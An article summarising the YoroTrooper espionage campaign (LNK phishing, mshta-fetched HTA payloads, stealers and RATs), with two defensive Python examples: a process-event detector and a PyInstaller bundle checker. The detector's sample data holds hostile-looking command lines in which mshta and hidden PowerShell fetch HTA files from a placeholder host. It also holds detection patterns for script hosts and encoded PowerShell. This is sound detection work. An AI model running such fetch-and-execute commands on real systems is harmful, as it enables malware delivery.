A new threat actor, dubbed YoroTrooper, has been targeting the Commonwealth of Independent States (CIS). It has been operating an espionage campaign against embassies and healthcare agencies since at least June 2022.
A glance at YoroTrooper campaign
According to a report by Cisco Talos, YoroTrooper primarily targets government agencies and energy organizations in Azerbaijan, Kyrgyzstan, and Tajikistan.
YoroTrooper was observed using themed lures/decoys targeting the Uzbekistani energy company UZBEKHYDROENERGO and Tajikistani government agencies, among others.
It successfully compromised and obtained credentials from a critical healthcare agency in the EU and the World Intellectual Property Organization (WIPO).
Cybercriminals also targeted embassies of European countries, including Turkmenistan and Azerbaijan, to exfiltrate documents and drop additional malware payloads.
Attack flow
The attack begins with phishing emails carrying malicious shortcut files (LNK) alongside legitimate PDF documents on national development strategy, which serve as decoys.
When the shortcut is opened, it launches mshta[.]exe to fetch HTA files from a remote server, which eventually drop the primary payload.
During its espionage drive, YoroTrooper exfiltrates large volumes of data, including credentials from multiple applications, browsing history, cookies, screenshots, and system information.
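The LNK-to-mshta chain described above leaves a distinctive process-creation trail: a script host (mshta.exe, powershell.exe) started by explorer.exe, often with a remote URL on its command line. The following is an added detection example, not code from the Talos report or from this article; it runs three such rules over a handful of constructed process-creation records in a simplified pipe-separated format (parent image | image | command line). The domain hta.example.invalid and the sample paths are placeholders, not indicators from the campaign.

```python
import ntpath
import re
from dataclasses import dataclass
from typing import Dict, List

# Script hosts commonly abused to run a remote HTA or a one-liner.
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "wscript.exe", "cscript.exe"}
# Hosts that a user double-clicking an LNK would rarely launch on purpose.
SHORTCUT_SUSPECT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
URL_RE = re.compile(r"\b(?:https?|ftp)://\S+", re.IGNORECASE)
HIDDEN_PS_RE = re.compile(r"-w(?:indowstyle)?\s+hidden|-enc(?:odedcommand)?\s", re.IGNORECASE)

# Constructed sample telemetry (not real events): parent image | image | command line.
SAMPLE_EVENTS = "\n".join([
    r"C:\Windows\explorer.exe|C:\Windows\System32\mshta.exe|mshta.exe http://hta.example.invalid/decoy.hta",
    r'C:\Windows\explorer.exe|C:\Program Files\Adobe\Acrobat\Acrobat.exe|"C:\Program Files\Adobe\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\strategy.pdf"',
    r"C:\Windows\System32\cmd.exe|C:\Windows\System32\mshta.exe|mshta.exe C:\ProgramData\setup.hta",
    r'C:\Windows\explorer.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -w hidden -c "Start-Process mshta.exe https://hta.example.invalid/stage2.hta"',
])


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str

    @property
    def parent_name(self) -> str:
        # ntpath handles Windows paths regardless of the host OS.
        return ntpath.basename(self.parent_image).lower()

    @property
    def image_name(self) -> str:
        return ntpath.basename(self.image).lower()


def parse_events(text: str) -> List[ProcessEvent]:
    """Parse the constructed 'parent|image|cmdline' format, one event per line."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        parent, image, cmdline = line.split("|", 2)
        events.append(ProcessEvent(parent, image, cmdline))
    return events


def evaluate(ev: ProcessEvent) -> List[str]:
    """Return the names of all rules the event matches (empty list if benign)."""
    hits = []
    # Rule 1: a script host given a remote URL (mshta fetching an HTA from a server).
    if ev.image_name in SCRIPT_HOSTS and URL_RE.search(ev.command_line):
        hits.append("script_host_remote_url")
    # Rule 2: explorer.exe spawning a script host, the shape of a clicked LNK.
    if ev.parent_name == "explorer.exe" and ev.image_name in SHORTCUT_SUSPECT_HOSTS:
        hits.append("explorer_spawned_script_host")
    # Rule 3: PowerShell asked to hide its window or run an encoded command.
    if ev.image_name == "powershell.exe" and HIDDEN_PS_RE.search(ev.command_line):
        hits.append("hidden_or_encoded_powershell")
    return hits


def scan(text: str) -> Dict[int, List[str]]:
    """Map the index of each flagged event to the rules it triggered."""
    return {i: hits for i, ev in enumerate(parse_events(text)) if (hits := evaluate(ev))}


if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(rules)}")
```

Only the first and fourth records are flagged; the Acrobat launch of the decoy PDF and the local-file mshta run from cmd.exe produce no hits, which is the trade-off of keying rule 2 on explorer.exe rather than on mshta.exe alone. In production the same rules map directly onto Sysmon Event ID 1 or Windows Security 4688 fields (ParentImage, Image, CommandLine).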
Ready-to-use tools and custom payload
YoroTrooper uses a mix of tools, including custom malware, commodity RATs, and stealers.
To steal credentials, it uses the open-source project Lazagne, the commercially available tool Stink Stealer, and custom scripts.
For remote access, it uses LodaRAT, AveMaria, Warzone RAT, and a custom Python-based malware that uses Telegram for C2 communication.
It uses tools such as PyInstaller or Nuitka to distribute and run the payload as a standalone application, eliminating the need for a Python installation on the infected machine.
In addition, researchers have observed the use of reverse shell binaries (including Meterpreter) and a custom C-based keylogger.
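Because the Python payloads are shipped as standalone bundles, a first triage step for a suspicious executable is to check whether it carries a PyInstaller archive. The example below is added here and is not code from the report or the article; it looks for the cookie PyInstaller appends to the bundle (magic bytes `MEI\x0c\x0b\x0a\x0b\x0e` followed by archive sizes, the Python version and the Python library name, the layout used since PyInstaller 2.1) and parses out the interpreter version. Nuitka produces native code with no comparable marker and is not covered. The sample input is a constructed stand-in, not a real payload.

```python
import struct
from dataclasses import dataclass
from typing import Optional

# Magic at the start of the PyInstaller CArchive cookie (PyInstaller's own constant).
PYINSTALLER_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
# Cookie layout (PyInstaller >= 2.1): magic, package length, TOC offset,
# TOC length, Python version as major*100+minor, 64-byte Python library name.
COOKIE_FORMAT = "!8siiii64s"
COOKIE_SIZE = struct.calcsize(COOKIE_FORMAT)  # 88 bytes


@dataclass
class BundleInfo:
    cookie_offset: int
    package_length: int
    toc_offset: int
    toc_length: int
    python_version: str
    python_lib: str


def find_pyinstaller_bundle(data: bytes) -> Optional[BundleInfo]:
    """Return cookie details if the bytes look like a PyInstaller bundle, else None."""
    # The cookie sits at the end of the appended archive, so search from the back.
    pos = data.rfind(PYINSTALLER_MAGIC)
    if pos < 0 or pos + COOKIE_SIZE > len(data):
        return None
    _magic, pkg_len, toc_off, toc_len, pyvers, pylib = struct.unpack_from(COOKIE_FORMAT, data, pos)
    major, minor = divmod(pyvers, 100)
    return BundleInfo(
        cookie_offset=pos,
        package_length=pkg_len,
        toc_offset=toc_off,
        toc_length=toc_len,
        python_version=f"{major}.{minor}",
        python_lib=pylib.rstrip(b"\x00").decode("ascii", "replace"),
    )


def build_sample_bundle() -> bytes:
    """Constructed stand-in for a packed executable: filler bytes plus a valid cookie."""
    body = b"MZ" + b"\x00" * 510 + b"constructed-archive-contents" * 8
    cookie = struct.pack(
        COOKIE_FORMAT, PYINSTALLER_MAGIC, len(body) + COOKIE_SIZE,
        512, len(body) - 512, 311, b"python311.dll",
    )
    return body + cookie


if __name__ == "__main__":
    info = find_pyinstaller_bundle(build_sample_bundle())
    print(info)
```

A hit tells an analyst that the file embeds Python bytecode and which interpreter version it was built with, which decides what tooling is needed to unpack and decompile the payload; a miss does not rule out Python, since Nuitka output and some PyInstaller variants with modified headers will not match.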
Concluding notes
YoroTrooper appears to have ample skills and resources at its disposal. Moreover, the use of LNK files together with PowerShell and MSHTA is becoming a popular tactic, as it lets attackers slip past security tools unnoticed. To stay protected, organizations are advised to keep their applications and anti-virus software up to date and to deploy anti-phishing solutions at the endpoints.